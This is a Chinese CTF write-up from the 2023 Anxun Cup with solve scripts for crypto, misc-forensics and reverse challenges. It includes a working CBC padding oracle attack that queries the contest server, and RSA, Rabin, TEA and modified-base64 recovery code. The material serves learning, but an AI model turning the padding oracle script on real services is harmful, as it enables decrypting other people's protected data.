2023 第六届安洵杯 writeup by Arr3stY0u


2023 第六届安洵杯 writeup by Arr3stY0u

HEADER

CTF组招新联系QQ2944508194,简历需为正式简历格式、请标注在赛事中的个人产出比,例如:某比赛团队总分2000分,我解出两个crypto共计500分占比25%。

所有方向均有名额,请不要担心投简历被拒等情况,未达标准我们会指出不足之处、给出学习建议。

CRYPTO

010101

漏洞点在

# Challenge snippet: one '1' of p1 is flipped to '0', then one position of p2
# is flipped to '1'.  Note that both list comprehensions enumerate p1, so the
# index flipped in p2 is chosen from the positions where p1 (after its own
# flip) holds a '0'.
p1[random.choice([i for i, c in enumerate(p1) if c == '1'])] = '0'
p2[random.choice([i for i, c in enumerate(p1) if c == '0'])] = '1'

p1只是随机的把1的位置转一个变成0,p2把0的位置随机转一个到1,直接逆回去即可

charon@root:~/Desktop$ nc 124.71.177.14 10001SHA256(XXXX + 46tr7JsAnftJaAj2):bb607c005123726d6b766c22aae953c9b940e577c6eee1834d58d7b4c8aed0bcGive Me XXXX:1sytPress 1 to get ciphertext16019317455682494995107595480323300301281684269012730701351084808534606861097128732387692056733235739412227197845372269245749475979859953325021664476734410014720575731925904251102442593366655668403990263995510181013967125954239625175574645528880102887522025817986086352977570193007925691015284660139223253228220926464455493650171833363306828825533183970870645343702260455069648577546810721443364714233897615935934061182371641485196971610941014551486749274990733592988218858582639685570222798909493131516292569896347886656702446663175379068445062433265887249121442843081298854979379309044313820236565465696783078902210984042378781107180522174145335181877185771417778786182565494016061073801247741867209575064278503975173367714279328270813546483805238498696044690583098990834784211919036346860413402581575433895652371104211107933523943509360601463071774985572704821763014944680693421537000199726125219694414715351566045540338629545939715947600874065078335187587078863350014327385920433498197661125807679619403475838017715901218100497835243145772103695402701587994437072004662725124293482700335262949601981312589614366480254708418472993474202513303919807797524074940590380140714449067896194906509099072762940779370480589405622367996909171011011001111001001011010001110110111000111001011100111111011010010111111001110011101010010111110100001001000100011101100001000010011110100000001101110111001111110010101100101011011000011101011110111010111010100101010010101100111011110111110111100011110010000101011110011001110111001111000010110010001111101110000100100110011000110111110110110110110000010100111101111110100100000111101011110000110001000101110100110101101000111011000010010001110011001010011111010100100111011111011011111000000000001100100110101011000000001001000011010010011001011010100000011111001010100101010001100
01110000000000100100001011110000111110000101100101110110010001000110010010110001011110100111001011001001000111110110001010100001110111000000010110100101011011011011101011000100001111001111111010100011101000001111001111100001000001011100101111010000000111101111101000010101110110110010000111011001010010110000011001100000000111011100111111010000110010101010001110100100001010100101011011101111111101010000000010111110111110001110011101101010011000010000000101100100010101110000000000010011010000100010111110100101001001010000000001111001110011110111110111110000000010011011010000100111110100010111010100110111001110000010110010010011010010101000001100101001111100100100111101100101101111000011101110101010101010101110010001011100011101111111001100100111011111011011110010001101100100010111100110100000000111111000101101000011101011010100011001010010110100110100010110111011010101111110100000000010000001011001101101000111100011010101101001101110101111100110010011010111001110000101000100010011100000010001111011100100101000001110110101001101011101101000000011001000011010010011001011101000010000110100101100010001101111100000010010101100011001010000010000000101101010001111001000010100000101110111000101110110100100010100110111000010110001010001010101101001000010011100000010010110000111011001000110110111000010111001000011000001001110000110000100010000111100111110000111110110001010011101110000001001111010100010101001000001010010100101101100000110100110001001100113639741957721452316976500773100864937092070232127542889772994773564014497673678846855074974390573154760588872825226516857739857722943445362351665244776632928074165700293157331795285773795044212555622984077281565861021014031785899405567882333479222154731086326424132166836545887300907286953530144770952091830545531131348306621103726659289579737156714463334440930922185072153960387877465278759796433396879455697305518063131565687468124683424824865462096245006793059295786127430254243848165932477966977300997290389723864051540498702842027
33894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581

exp

from gmpy2 import *
from Crypto.Util.number import *
from tqdm import *

# RSA modulus printed by the service (n = p * q).
n=601931745568249499510759548032330030128168426901273070135108480853460686109712873238769205673323573941222719784537226924574947597985995332502166447673441001472057573192590425110244259336665566840399026399551018101396712595423962517557464552888010288752202581798608635297757019300792569101528466013922325322822092646445549365017183336330682882553318397087064534370226045506964857754681072144336471423389761593593406118237164148519697161094101455148674927499073359298821885858263968557022279890949313151629256989634788665670244666317537906844506243326588724912144284308129885497937930904431382023656546569678307890221098404237878110718052217414533518187718577141777878618256549401606107380124774186720957506427850397517336771427932827081354648380523849869604469058309899083478421191903634686041340258157543389565237110421110793352394350936060146307177498557270482176301494468069342153700019972612521969441471535156604554033862954593971594760087406507833518758707886335001432738592043349819766112580767961940347583801771590121810049783524314577210369540270158799443707200466272512429348270033526294960198131258961436648025470841847299347420251330391980779752407494059038014071444906789619490650909907276294077937048058940562236799690917
# Leaked 2048-character bit string (p1 || p2 after the two flips shown in the
# challenge snippet above).  This name is reassigned to the recovered integer
# p further down; the commented-out search between the two is what undid the
# flips.
p='10110110011110010010110100011101101110001110010111001111110110100101111110011100111010100101111101000010010001000111011000010000100111101000000011011101110011111100101011001010110110000111010111101110101110101001010100101011001110111101111101111000111100100001010111100110011101110011110000101100100011111011100001001001100110001101111101101101101100000101001111011111101001000001111010111100001100010001011101001101011010001110110000100100011100110010100111110101001001110111110110111110000000000011001001101010110000000010010000110100100110010110101000000111110010101001010100011000111000000000010010000101111000011111000010110010111011001000100011001001011000101111010011100101100100100011111011000101010000111011100000001011010010101101101101110101100010000111100111111101010001110100000111100111110000100000101110010111101000000011110111110100001010111011011001000011101100101001011000001100110000000011101110011111101000011001010101000111010010000101010010101101110111111110101000000001011111011111000111001110110101001100001000000010110010001010111000000000001001101000010001011111010010100100101000000000111100111001111011111011111000000001001101101000010011111010001011101010011011100111000001011001001001101001010100000110010100111110010010011110110010110111100001110111010101010101010111001000101110001110111111100110010011101111101101111001000110110010001011110011010000000011111100010110100001110101101010001100101001011010011010001011011101101010111111010000000001000000101100110110100011110001101010110100110111010111110011001001101011100111000010100010001001110000001000111101110010010100000111011010100110101110110100000001100100001101001001100101110100001000011010010110001000110111110000001001010110001100101000001000000010110101000111100100001010000010111011100010111011010010001010011011100001011000101000101010110100100001001110000001001011000011101100100011011011100001011100100001100000100111000011000010001000011110011111000011111011000101001110111000000100111101010001010100100000101001010010110110000011010011000100110011'
# Ciphertext printed by the service.
c=363974195772145231697650077310086493709207023212754288977299477356401449767367884685507497439057315476058887282522651685773985772294344536235166524477663292807416570029315733179528577379504421255562298407728156586102101403178589940556788233347922215473108632642413216683654588730090728695353014477095209183054553113134830662110372665928957973715671446333444093092218507215396038787746527875979643339687945569730551806313156568746812468342482486546209624500679305929578612743025424384816593247796697730099729038972386405154049870284202733894691445908782979047583747805480771490450196971406525546547633889579020657723518264942003696915665961917952145217112253633848340252914175173075397993827903442120956864909938018097693848776019514421316178494154048707742544644528988010562573565558284797954675624387786817541580112660601516327573201366674069645447118005820926804579361542035220072853409208648240744370817666664321901270023789263924215039347973482121942421086705477108683641497511641488548191336178503962755347682824818128652286066613903859084167048583875734142764229143321297366252916602852741256994030818854232006056387114490752371418983540535937394700286498254726888830557455770169142748255294430133390313625632387288003135311581
# Search that recovered p (kept as the author left it): flip one '0' of the
# first half back to '1' and one position of the second half back to '0' and
# test divisibility of n.  Like the challenge code, both index lists are
# taken from the first half.
# p1=p[:1024]
# p2=p[1024:]
# pp1=[i for i, c in enumerate(p1) if c == '0']
# pp2=[i for i, c in enumerate(p1) if c == '1']
# print(pp1)
# for i in tqdm(pp1):
#     p1 = list(p[:1024])
#     p1[i]='1'
#     for j in pp2:
#         p2 = list(p[1024:])
#         p2[j]='0'
#         ppp=''.join(p1) + ''.join(p2)
#         ppp2=int(ppp,2)
#         if n%ppp2==0:
#             print(ppp2)
#             break
# The prime factor found by the search above.
p=23035125732261132358670499878109017381474612877560501678840135971884602002596362770042962719837871778607403423140553717636949563024173949672281747566044348211883894971758093237914208347253908009359914127501739323351540268777972140879841918587634194478383649138731012434783470970638093549174619359989933572268463391374193459608549354611510909253795420360095279545780658678412847237770763508515088914878492525553581261678529131687242421476753253431930293211570439334452217877146659650508457581300434519215816445425880176422556848574152119462509229109443358566019337029013527249995191088717060570352636009477629767659827
print(isPrime(p))
# Textbook RSA decryption with e = 65537 once both factors are known.
q=n//p
e = 0x10001
d=invert(e,(p-1)*(q-1))
m=pow(c,d,n)
print(long_to_bytes(m))
b'D0g3{sYuWzkFk12A1gcWxG9pymFcjJL7CqN4Cq8PAIACObJ}'

POA

CBC padding oracle attack (POA)

from pwn import *
from hashlib import sha256
import string
from pwnlib.util.iters import mbruteforce
import binascii

r = remote("124.71.177.14",10010)
table = string.ascii_letters+string.digits


# Solve the service's proof-of-work: it prints a 16-character suffix and a
# SHA-256 digest and expects the 4-character prefix XXXX (alphabet `table`)
# with sha256(XXXX + suffix) == digest.
# NOTE(review): this shadows the builtin pow(); harmless here only because
# the script never uses the builtin afterwards.
def pow():
    r.recvuntil("XXXX + ")
    suffix = r.recv(16).decode("utf8")
    r.recvuntil(":")
    cipher = r.recvline().strip().decode("utf8")
    proof = mbruteforce(lambda x: sha256((x + suffix).encode()).hexdigest() == cipher, table, length=4, method='fixed')
    r.sendline(proof)


pow()
# Menu option 1 returns the encrypted flag as hex: 16-byte IV, then ciphertext.
# NOTE(review): the escapes in this script ('n', b'x00') look like '\n' and
# b'\x00' with the backslashes lost in transcription; they are kept verbatim.
r.sendline('1')
r.recvuntil('This is your flag: ')
c=r.recvuntil('n',drop=True)
print('c=',c)
iv = c[:32]
cipher = c[32:]
enc=binascii.unhexlify(cipher)
iv=binascii.unhexlify(iv)
print('enc=',enc)
print('iv=',iv)
# Plaintext of the block, recovered from the last byte backwards.
pt = bytearray(b'x00'*16)
for make_pad_len in range(1, 17):
    # iv XOR the bytes already recovered == the block-cipher output for those
    # positions, so they can be forced to any value below.
    xored_iv = bytearray(16)
    for i in range(16):
        xored_iv[i] = iv[i] ^ pt[i]
    index = 16-make_pad_len
    for i in range(0x100):
        _iv = bytearray(16)
        # Make every already-known tail byte decrypt to the current pad value.
        for j in range(index, 16):
            _iv[j] = xored_iv[j] ^ make_pad_len
        _iv[index] = i
        _iv = bytes(_iv.rjust(16, b'x00'))+enc
        ivv=_iv.hex()
        # Menu option 2 is the oracle: it answers True/False depending on
        # whether the submitted ciphertext decrypts to valid padding.
        r.sendline('2')
        r.recvuntil('Please enter ciphertext:n')
        # print('tt=',len(tt))
        print('ivv=',ivv)
        r.send(str(ivv))
        res=r.recvuntil('n')
        # print('res=',res)
        if b'True' in res:
            # Valid padding means decrypt(enc)[index] ^ i == make_pad_len,
            # so the plaintext byte is i ^ iv[index] ^ make_pad_len.
            v = i ^ iv[index] ^ make_pad_len
            pt[index] = v
            print(chr(v), pt.hex(), bytes(pt))
            break
r.interactive()
ivv= 10660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 11660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 12660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 13660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 14660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 15660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 16660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 17660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 18660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdivv= 19660c133b052b632110242b782073692bae5e1757e42a6a8a5a384f0a7c81fdM 4d467b305040643454746b7d04040404 b'MF{0P@d4Ttk}x04x04x04x04'[*] Switching to interactive mode
D0g3{0P@d4Ttk}

Rabin

第一步爆破x,获得r,从而n1=n//r=p*q

第二步注意到inv_p*p+inv_q*q=n1+1,再加上p*q=n1,可以求得p,q

第三步,爆破e2,根据p,q直接求d,解密第二部分m,验证前10个字符isprintable就可以爆破出,e2 为 5,第二部分40-a9e4-a67a9ba15345}

第四步,根据relation()以及第一步,判断x比较可能是8;再根据e2爆破出e1是2,Rabin解密得到第一段D0g3{82309bce-9db6-53

最终flag:D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}

Python代码如下:

from Crypto.Util.number import *
from gmpy2 import *

# Challenge parameters.  n = p * q * r (asserted later in the script); inv_p
# and inv_q are the inverses of p mod q and of q mod p; c1 is the Rabin
# ciphertext of the first half of the flag and c2 the ciphertext of the
# second half (decrypted with a small exponent e2, per the writeup).
n = 285333097560579856892735567589027491455281816676548482904879584411084840450605271899236335787378212457644480538489333957199681005051324763317061914445335184643625612096862543286134102802857549376968548460142475231575293784694948584292852369440735047979684088368282494500434727138560870002195137014489167165627331632368455059106946492710112045617183371020744982960108917884038933243553293376828996387182739769132792122496876799056412450480295939241242493468339649702797915685408056205502660879129130498545921410634619659281124474952328520326377732861327885460825785663612083850698299251860568500798463658863076047273218029864658192865375924206328915181982984562250516942987232706349911392265126207255534866190377014380855435918220022982938162059864440683044775523888991188203006479911766073854154460130165113177584072109403534582913430806912608626570189230138578926612739070744683368688850886527094463667668825307246359436635233811527374246463299941661976846168659355118349992007638908363168630724274951
inv_p = 15518556384860245743478620429603192585685787953718242976660224479750998999124338822955414145628584896866254074982803409103638138579055846815417400924284717580342975268418607314979326166327341036902072011846895021125831579420772494902187900359222937225476944827334097644914928633555605528401231109679269995086
inv_q = 155844952786694191575297403428699000736198123964886234441336879931357938912183547278484904361669861403393518512602888045819050991788625527088116664969187555777028144199786402659623855374576202766323863308930997626431142188895581868394783999218343754370726823809671619460649473747905784816603565738974432428480
c1 = 126976144638062411994384099639219893719548652649797747968794241772829388392059131204549804095367482955713969969355185232593725760428681633925245739792469765283064470833596211603668120879365838887254328902988534426769340803326035688970033255868390278666156442829111587282507934612148101514683146219594379325568501808994038719784055659363522080979550015313702694077294838434724135616183144122907039758450363380287762050096893679619122349248941856699588431034712017310975233907480446137538753544059977757157457507646299200188974533402557530497781126307449150221146472482007846609714342333817505591830507656245367858711393207787365997909956902207542164544097922462033634018795680632571241102059887769247904527047628319436872644835675831505379779011242527097220466159871163455244971911311179106589058265977916423231213266773521104981166940713044082334510252946317916149089661406584941263677321406447326099096001132473765127971954144881177204994916711534164440380921197150440049304017047080659500777241740528
c2 = 146941331442564610016438819735547244506352704046774905613426284012869732747925710307265626766652735661835157362691409229558530888941189129960135439286471184689177437139594351730287457489682323200067610139473500557213628686488936379775312971741967583943854236936993185362784886957646210710012024839783323641398605391643544058597455541620941929330435766958836695050614733661967896963275403693970761214082313515330149780215334487889969179336091893274890943467738514867511025492419144817240630139160081094440537994689088123579690334770462633832325163789325881676740410159219779623129230840988303480150753783702883385763373756192046417120986761450383952686760580908911815204339547584815987309530429459803006137138710075476256076429790734381285100612579775390606666816783573924249773339782127155714010817196675330870127749087069339556243710348583718134476356016094530370196897414589976876765847625687561629780514239120563907981343926849715187507551839537984064153228278609868504300922982445067467503667611505

# Factors recovered in the earlier steps: r from the search at the bottom of
# this file (r = 2 * x**k - 1, per the writeup), p and q from
# inv_p * p + inv_q * q == n1 + 1 together with p * q == n1.
r=10407932194664399081925240327364085538615262247266704805319112350403608059673360298012239441732324184842421613954281007791383566248323464908139906605677320762924129509389220345773183349661583550472959420547689811211693677147548478866962501384438260291732348885311160828538416585028255604666224831890918801847068222203140521026698435488732958028878050869736186900714720710555703168729087
p=172734683184670521870728305371917464596062609133662457971030651681563614292692150176606848807534588267834112546004233695199322884456898046304537198440536833886920821550944800659049952451650465399792357613884244821145480278404875760748959392209037101099598435512738382399052937036823852468261051762813693137499
q=158711409682623467193918200983728047440421670534311259267841341750844583719487872424882600690624065414558783083519077629543263229349472283576912545178060245058165997332172994084313993698397899585980714769786106061192880855558784452710588701697475203159038487141201679925814406643761912866831915524057271725627
assert inv_p==invert(p,q)
assert inv_q==invert(q,p)
assert n==p*q*r
n1=n//r
#2 · 3^2 · 71
phi=(p-1)*(q-1)


def test(m):
    """Return 1 when every byte of m lies in 30..128 (roughly printable), else 0."""
    for i in m:
        if i<30 or i>128:
            return 0
    return 1


print(phi)


def relation(e1,e2):
    """Mirror of the challenge's relation(): True when
    1 + e1 + e1**2 + e1**3 + e1**4 == 1 + e2 + e2**2.
    For e1 = 2 and e2 = 5 both sums equal 31."""
    a, b = 0, 0
    for i in range(8 - (2**2 - 1)):
        a += pow(e1, i)
    for j in range(3):
        b += pow(e2, j)
    if a == b:
        return True
    return False


e1=2
e2=5
# Rabin decryption of c1 via CRT (p, q both 3 mod 4 is assumed by the
# (p+1)//4 exponent).  The four roots a, b, c, d are printed and the readable
# one is the first half of the flag.
mp = pow(c1, (p + 1) // 4, p)
mq = pow(c1, (q + 1) // 4, q)
a = (inv_p * p * mq + inv_q * q * mp) % n1
b = n1 - int(a)
c = (inv_p * p * mq - inv_q * q * mp) % n1
d = n1- int(c)
for i in (a, b, c, d):
    print(long_to_bytes(i))
exit()
# NOTE(review): everything below is unreachable -- the exit() above ends the
# script -- and preserves the exploration steps in the order they were run.
exit()
# e1 search: which small e1 satisfies relation(e1, 5).
for i in range(1,600):
    if(relation(i,e2)):
        print(i)
exit()
#D0g3{82309bce-9db6-5340-a9e4-a67a9ba15345}
from tqdm import tqdm
# e2 search: decrypt c2 with d = e2**-1 mod phi and keep the candidate whose
# leading bytes look printable.
for i in tqdm(range(4,6)):
    if gcd(i,phi)>1:
        continue
    d=invert(i,phi)
    m=pow(c2,d,n1)
    m=long_to_bytes(m)
    if b"}" in m[:30] and test(m[:10])==1:
        print(i,m)
exit()
# r search: for each base x, r = 2 * x**k - 1 for the first k that gives more
# than 1024 bits and a prime; the x whose r divides n is the one used.
# NOTE(review): this loop reuses the names r and d, shadowing the factor r
# and the private exponent above; harmless only because it never runs.
for x in range(2,100):
    r = 2
    print("begin",x)
    while True:
        r = r * x
        if r.bit_length() > 1024 and isPrime(r - 1):
            r = r - 1
            break
    if n%r==0:
        print(x,r)

MISC

dacongのWindows

桌面flag3一串PBE

2023 第六届安洵杯 writeup by Arr3stY0u

根据描述提示注册表,windows.registry.printkey拿到一串字符d@@Coong_LiiKEE_F0r3NsIc

2023 第六届安洵杯 writeup by Arr3stY0u

aes解出flag3

2023 第六届安洵杯 writeup by Arr3stY0u

document下secret.rar

2023 第六届安洵杯 writeup by Arr3stY0u

rstudio恢复出来解压有点问题,用vol3

2023 第六届安洵杯 writeup by Arr3stY0u

一堆空白

2023 第六届安洵杯 writeup by Arr3stY0u

很明显的snow了

2023 第六届安洵杯 writeup by Arr3stY0u

拿到flag2

2023 第六届安洵杯 writeup by Arr3stY0u

提示music

2023 第六届安洵杯 writeup by Arr3stY0u

dacong_like_listen下面一堆wav,听上去就很像sstv,一个一个试过去

39.wav拿到flag1

2023 第六届安洵杯 writeup by Arr3stY0u

拼接flag

flag{Ar3_Th3Y_tHE_DddddAc0Ng_SIst3Rs????}

签到处

D0g3{We1come_TO_AXB_F1111@g}

Nahida

reverse jpg

2023 第六届安洵杯 writeup by Arr3stY0u

文件尾

2023 第六届安洵杯 writeup by Arr3stY0u

反复提到眼睛,猜测silenteye。那个你一直在寻找的答案,早已出现在你的旅途,fuzz后指的是密码是题目名

2023 第六届安洵杯 writeup by Arr3stY0u

dacongのsecret

png fft拿到第一个密码

2023 第六届安洵杯 writeup by Arr3stY0u

同样套路,jpg文件尾reverse 压缩包

2023 第六届安洵杯 writeup by Arr3stY0u

又要密码

回去看png,很明显19 chunk块长度小于0x10000,那么20 chunk块肯定是多余的(经测试删除后png不会少任何像素)

2023 第六届安洵杯 writeup by Arr3stY0u

将19chunk块拿出来,补个png文件头(直接用题目png的文件头)

2023 第六届安洵杯 writeup by Arr3stY0u

爆破一下宽高,860*123拿到key

2023 第六届安洵杯 writeup by Arr3stY0u

解压后,一眼base64隐写

2023 第六届安洵杯 writeup by Arr3stY0u

2023 第六届安洵杯 writeup by Arr3stY0u

拿到pass,fuzz后是上一个jpg的jphs,拿到flag

2023 第六届安洵杯 writeup by Arr3stY0u

2023 第六届安洵杯 writeup by Arr3stY0u

疯狂的麦克斯

1.将docx文件转换为zip提取隐藏文件

2023 第六届安洵杯 writeup by Arr3stY0u

2.将麦克斯的称号打开后解密零宽字符得到麦克斯的称号

2023 第六届安洵杯 writeup by Arr3stY0u

3.将隐藏的txt文件打开后发现为一个列表,列表的末尾有一串密文

2023 第六届安洵杯 writeup by Arr3stY0u

使用ROT13并将amount设置为22,解密密文后得到THIS IS MKS DO YOU KNOW WHOAMI

2023 第六届安洵杯 writeup by Arr3stY0u

4.将列表也进行同样的解密;根据题目描述,只要将列表中的每一个值进行base64编码,就可以在其中找到正确的压缩包密码

2023 第六届安洵杯 writeup by Arr3stY0u

脚本如下

import base64
# Values taken from the hidden txt file.  The writeup shows only the first
# three entries; the trailing '...' is the author's elision, not valid Python.
lst = ['71132E', '328051N', '248199O'...]
def encrypt_string(string):
    """Return the base64 text of *string* (UTF-8 in, ASCII text out).

    Despite the name this is an encoding, not encryption: every list entry
    is base64-encoded to build the archive-password candidate list.
    """
    raw = string.encode('utf-8')
    return base64.b64encode(raw).decode('utf-8')
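# Write one base64 candidate per line so output.txt can be fed to an archive
# password brute-forcer.  The page's copy ended each line with 'n' (the
# backslash of '\n' was lost in transcription), which would glue every
# candidate onto a single line; '\n' restores one candidate per line.
with open('output.txt', 'w', encoding='utf-8') as file:
    for value in lst:
        file.write(encrypt_string(value) + '\n')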

爆破

2023 第六届安洵杯 writeup by Arr3stY0u

解压压缩包得到flag

2023 第六届安洵杯 writeup by Arr3stY0u

REVERSE

MobileGo

libgojni.so的mobile_go_Checkflag函数完成加密,首先初始化随机数生成器,种子为2023

2023 第六届安洵杯 writeup by Arr3stY0u

之后随机生成两个随机数并将其作为索引完成flag中字符位置的互换

2023 第六届安洵杯 writeup by Arr3stY0u

解密脚本如下,首先通过Go语言生成伪随机数

package main

import (
	"fmt"
	"math/rand"
)

// main reproduces the swap-index pairs used by mobile_go_Checkflag: a
// math/rand generator seeded with the fixed value 2023 yields 0x26 (38) pairs
// of indices in [0, 0x26), printed as "[a,b]," so the list can be pasted into
// the Python restore script.  A fixed seed is what makes the permutation
// reproducible, and therefore reversible, by anyone who knows it.
func main() {
	const count = 0x26
	rng := rand.New(rand.NewSource(2023))
	for pair := 0; pair < count; pair++ {
		first := rng.Intn(count)
		second := rng.Intn(count)
		fmt.Printf("[%d,%d],", first, second)
	}
}

然后从后往前还原,密文从Android的资源文件中提取

# Scrambled flag as extracted from the app's resources.
flag=bytearray(b"49021}5f919038b440139g74b7Dc88330e5d{6")
# Swap pairs printed by the Go program above (math/rand seeded with 2023).
key=[[11,14],[15,37],[24,18],[8,30],[6,9],[30,3],[29,9],[4,13],[13,24],[37,1],[28,28],[3,1],[23,22],[21,26],[7,19],[1,34],[37,17],[27,29],[31,30],[14,2],[35,34],[4,27],[9,3],[3,24],[30,29],[3,27],[14,25],[26,0],[4,28],[5,15],[9,9],[13,18],[24,3],[35,24],[36,27],[25,21],[11,4],[27,28]]
# The checker applied the swaps front to back; undoing them in reverse order
# puts every character back where it started.
for left, right in reversed(key):
    flag[left], flag[right] = flag[right], flag[left]
print(flag)
D0g3{4c3b5903d11461f94478b7302980e958}

你见过蓝色的小鲸鱼

通过IDA插件可知`BlowFish`加密算法,用户名作为密钥,提取密文后编写脚本解密

2023 第六届安洵杯 writeup by Arr3stY0u

from Crypto.Cipher import Blowfish

# Key is the username (per the writeup); it looks like base64 text but is
# used as raw bytes.  ECB mode, as recovered from the binary.
key=b'UzBtZTBuZV9EMGcz'
bf=Blowfish.new(key,Blowfish.MODE_ECB)
# Ciphertext pulled from the binary.
# NOTE(review): the escapes appear to have lost their backslashes in
# transcription (b"\x11\xA5..." would be 16 bytes, two Blowfish blocks); kept
# verbatim, but as written this literal is 48 ASCII characters.
enc=b"x11xA5x1Fx04x95x50xE2x50x8Fx17xE1x6CxF1x63x2Bx47"
print(bf.decrypt(enc))
#QHRoZWJsdWVmMXNo

牢大想你了

反编译Assembly-CSharp.dll文件

其中GameManager.OnValueChanged对输入完成TEA加密

2023 第六届安洵杯 writeup by Arr3stY0u

解密脚本如下

#include<string.h>#include <stdio.h>
/* Decrypt the six TEA blocks recovered from GameManager.OnValueChanged and
 * print the plaintext bytes in memory order.  Standard TEA: 32 rounds,
 * delta 0x9e3779b9, key of four identical words 0x11111111 (286331153). */
int main(){
    unsigned int Data[12] = { 3363017039U, 1247970816U, 549943836U, 445086378U, 3606751618U, 1624361316U, 3112717362U, 705210466U, 3343515702U, 2402214294U, 4010321577U, 2743404694U };
    unsigned int key[4] = { 286331153, 286331153, 286331153, 286331153 };
    const unsigned int delta = 0x9e3779b9;

    for (int blk = 0; blk < 12; blk += 2) {
        unsigned int v0 = Data[blk];
        unsigned int v1 = Data[blk + 1];
        /* Decryption starts from the sum reached after 32 encryption rounds. */
        unsigned int sum = delta * 32;
        for (int round = 0; round < 32; ++round) {
            v1 -= ((v0 << 4) + key[2]) ^ (v0 + sum) ^ ((v0 >> 5) + key[3]);
            v0 -= ((v1 << 4) + key[0]) ^ (v1 + sum) ^ ((v1 >> 5) + key[1]);
            sum -= delta;
        }
        Data[blk] = v0;
        Data[blk + 1] = v1;
        /* Emit the 8 bytes of the two words exactly as they sit in memory. */
        const unsigned char *bytes = (const unsigned char *)&Data[blk];
        for (int k = 0; k < 8; ++k)
            putchar(bytes[k]);
    }
    return 0;
}

结果为 it_is_been_a_long_day_without_you_my_friend

你好,PE

找到关键代码,有点像CRC64

2023 第六届安洵杯 writeup by Arr3stY0u

搜了个脚本一把梭

import struct
def decode_k(v):
    """Undo one step of the binary's 64-bit mixing (likened to CRC64 in the writeup).

    The low bit records whether the forward step shifted a 1 out at the top:
    when it is set, the constant 0x54AA4A9 is XORed back in before the
    right shift and bit 63 is restored afterwards.
    """
    low_bit_set = bool(v & 1)
    shifted = (v ^ 0x54AA4A9 if low_bit_set else v) >> 1
    if low_bit_set:
        shifted |= 1 << 63
    return shifted
# 48 bytes (six little-endian 64-bit words) copied from the binary's table.
g_key = bytearray.fromhex('4DB87629F5A99E595556B1C42F212C30B3797817A8EDF7DBE153F0DBE903515E09C100DFF096FCC1B5E6629501000000')
single_len = 8
# Cut the first six 8-byte words and decode each one as '<Q'.
g_output = [
    struct.unpack('<Q', g_key[offset:offset + single_len])[0]
    for offset in range(0, 6 * single_len, single_len)
]
def decode_j(v):
    """Apply decode_k 64 times, once per bit of the 64-bit word."""
    result = v
    for _ in range(64):
        result = decode_k(result)
    return result
# Reverse every word, repack it little-endian and join the 8-byte pieces.
r = [decode_j(word) for word in g_output]
flag = [struct.pack('<Q', word).decode() for word in r]
print(''.join(flag))
#D0g3{60E1E72A-576A8BF0-7701CBB9-B02415EC}

感觉有点点简单

主函数获取数据后进行魔改rc4和魔改base64加密

2023 第六届安洵杯 writeup by Arr3stY0u

rc4魔改了sbox的大小和最后异或结果

2023 第六届安洵杯 writeup by Arr3stY0u

base64魔改了表和位运算的操作

2023 第六届安洵杯 writeup by Arr3stY0u

解密脚本

#include<stdio.h>#include<stdlib.h>#include<string.h>#define sboxSize 64
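/* Return the index of c in base64_map, or 0 when c is not in the map.
 * The original fell off the end of the function for characters outside the
 * table (undefined behaviour); returning 0 keeps the caller from consuming an
 * indeterminate value.  strlen() is taken once instead of on every loop. */
unsigned char findPos(const unsigned char* base64_map, unsigned char c)
{
    size_t mapLen = strlen((const char*)base64_map);
    for (size_t i = 0; i < mapLen; i++) {
        if (base64_map[i] == c)
            return (unsigned char)i;
    }
    return 0;
}

/* Decode the challenge's modified base64: a custom alphabet and a different
 * recombination of the four 6-bit groups than the standard one (the standard
 * shifts are kept in comments inside the loop for comparison).  '=' padding
 * is interpreted as in standard base64: "==" leaves one byte in the last
 * group, "=" leaves two.
 * Returns a malloc()ed, NUL-terminated buffer the caller must free(), or
 * NULL when the input is shorter than one group or malloc() fails. */
unsigned char* base64_decode(const unsigned char* code0)
{
    const unsigned char* code = code0;
    const unsigned char base64_map[65] = "4KBbSzwWClkZ2gsr1qA+Qu0FtxOm6/iVcJHPY9GNp7EaRoDf8UvIjnL5MydTX3eh";
    long len = (long)strlen((const char*)code);
    long flag = 0;      /* bytes held by the final padded group: 1 for "==", 2 for "=" */
    long str_len;
    unsigned char* res;
    unsigned char a[4] = { 0 };

    /* Fewer than four characters is not even one group; the original read
     * code[len - 2] here, which is out of bounds for an empty string. */
    if (len < 4)
        return NULL;

    if (code[len - 1] == '=') {
        if (code[len - 2] == '=') {
            flag = 1;
            str_len = len / 4 * 3 - 2;
        } else {
            flag = 2;
            str_len = len / 4 * 3 - 1;
        }
    } else {
        str_len = len / 4 * 3;
    }

    res = (unsigned char*)malloc((size_t)str_len + 1);
    if (res == NULL)
        return NULL;

    /* Every complete group of four characters yields three bytes;
     * str_len - flag stops before the padded group handled by the switch. */
    for (long i = 0, j = 0; j < str_len - flag; j += 3, i += 4) {
        a[0] = findPos(base64_map, code[i]);     /* table index of each character */
        a[1] = findPos(base64_map, code[i + 1]);
        a[2] = findPos(base64_map, code[i + 2]);
        a[3] = findPos(base64_map, code[i + 3]);
        res[j]     = a[0] | ((a[1] & 0x3) << 6);
        res[j + 1] = ((a[1] & 0x3c) >> 2) | ((a[2] & 0xf) << 4);
        res[j + 2] = ((a[3] & 0x3f) << 2) | ((a[2] & 0x30) >> 4);
        /* standard base64 would be:
         * res[j]     = a[0] << 2 | a[1] >> 4;
         * res[j + 1] = a[1] << 4 | a[2] >> 2;
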